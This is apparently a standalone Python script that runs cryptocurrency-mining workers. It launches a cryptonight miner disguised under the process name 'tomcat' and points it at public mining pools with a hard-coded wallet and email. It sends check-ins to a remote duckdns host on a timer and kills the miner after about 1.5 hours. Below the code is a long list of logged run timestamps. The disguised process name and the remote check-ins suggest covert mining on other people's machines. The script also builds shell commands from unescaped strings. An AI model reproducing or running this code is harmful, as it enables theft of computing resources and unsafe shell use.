import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:21:01.546662
#2018-02-17 16:07:04.969009
#2018-02-17 17:54:07.708083
#2018-02-17 19:43:01.280997
#2018-02-17 21:29:07.264898
#2018-02-17 23:14:05.457953
#2018-02-18 01:01:05.792567
#2018-02-18 02:48:05.604539
#2018-02-18 04:38:01.383607
#2018-02-18 06:28:07.440920
#2018-02-18 08:17:06.635206
#2018-02-18 10:05:06.767911
#2018-02-18 11:51:06.863320
#2018-02-18 13:36:07.622152
#2018-02-18 15:26:07.301589
#2018-02-18 17:15:06.988320
#2018-02-18 19:03:05.138671
#2018-02-18 20:50:01.472549
#2018-02-18 22:35:05.517669
#2018-02-19 00:23:02.034453
#2018-02-19 02:08:05.495233
#2018-02-19 03:54:07.864472
#2018-02-19 05:38:06.508741
#2018-02-19 07:26:08.261767
#2018-02-19 09:16:01.889820
#2018-02-19 11:05:09.682383
#2018-02-19 12:52:07.927108
#2018-02-19 14:40:04.802745
#2018-02-19 16:27:09.238415
#2018-02-19 18:12:08.823429
#2018-02-19 20:00:10.720237
#2018-02-19 21:48:07.660785
#2018-02-19 23:36:01.708948
#2018-02-20 01:23:07.747275
#2018-02-20 03:13:02.190206
#2018-02-20 04:59:05.150336
#2018-02-20 06:41:06.590540
#2018-02-20 08:26:07.707944
#2018-02-20 10:11:04.174784
#2018-02-20 11:55:09.330440
#2018-02-20 13:42:06.658555
#2018-02-20 15:26:04.963282
#2018-02-20 17:11:05.268940
#2018-02-20 18:59:06.902250
#2018-02-20 20:49:01.319567
#2018-02-20 22:33:06.051430
#2018-02-21 00:15:08.178733
#2018-02-21 02:03:04.815694
#2018-02-21 03:49:07.805790
#2018-02-21 05:38:01.315337
#2018-02-21 07:26:09.091915
#2018-02-21 09:11:01.708427
#2018-02-21 10:59:01.892746
#2018-02-21 12:45:15.844506
#2018-02-21 14:33:04.102566
#2018-02-21 16:19:07.406123
#2018-02-21 18:08:09.324845
#2018-02-21 19:54:07.690251
#2018-02-21 21:41:03.552488
#2018-02-21 23:28:04.431245
#2018-02-22 01:16:06.289472
#2018-02-22 03:04:06.692282
#2018-02-22 04:49:08.334963
#2018-02-22 06:35:05.981891
#2018-02-22 08:23:05.399857
#2018-02-22 10:11:06.148689
#2018-02-22 11:57:08.735015
#2018-02-22 13:42:04.519869
#2018-02-22 15:29:01.488764
#2018-02-22 17:14:10.019461
#2018-02-22 18:59:08.624527
#2018-02-22 20:51:07.402128
#2018-02-22 22:38:02.148107
#2018-02-23 00:24:07.365458
#2018-02-23 02:12:01.422044
#2018-02-23 03:59:08.373977
#2018-02-23 05:46:03.799070
#2018-02-23 07:36:06.968060
#2018-02-23 09:40:09.989095
#2018-02-23 11:45:02.908404
#2018-02-23 13:34:08.759177
#2018-02-23 15:22:09.028971
#2018-02-23 17:10:10.858589
#2018-02-23 18:55:08.876899
#2018-02-23 20:41:01.283943
#2018-02-23 22:26:05.074598
#2018-02-24 00:13:08.522802
#2018-02-24 02:05:09.244961
#2018-02-24 03:37:05.188981
#2018-02-24 05:10:08.747201
#2018-02-24 06:47:07.715013
#2018-02-24 08:21:01.459112
#2018-02-24 09:50:01.496388
#2018-02-24 11:33:05.532872
#2018-02-24 13:00:04.314599
#2018-02-24 14:34:05.465002
#2018-02-24 16:04:05.067780
#2018-02-24 17:37:05.066737
#2018-02-24 19:12:04.070984
#2018-02-24 20:45:07.428078
#2018-02-24 22:31:03.393317
#2018-02-25 01:03:01.900567
#2018-02-25 03:56:04.872186
#2018-02-25 06:41:01.641669
#2018-02-25 11:36:07.586504
#2018-02-25 13:34:01.995730
#2018-02-25 15:08:01.899570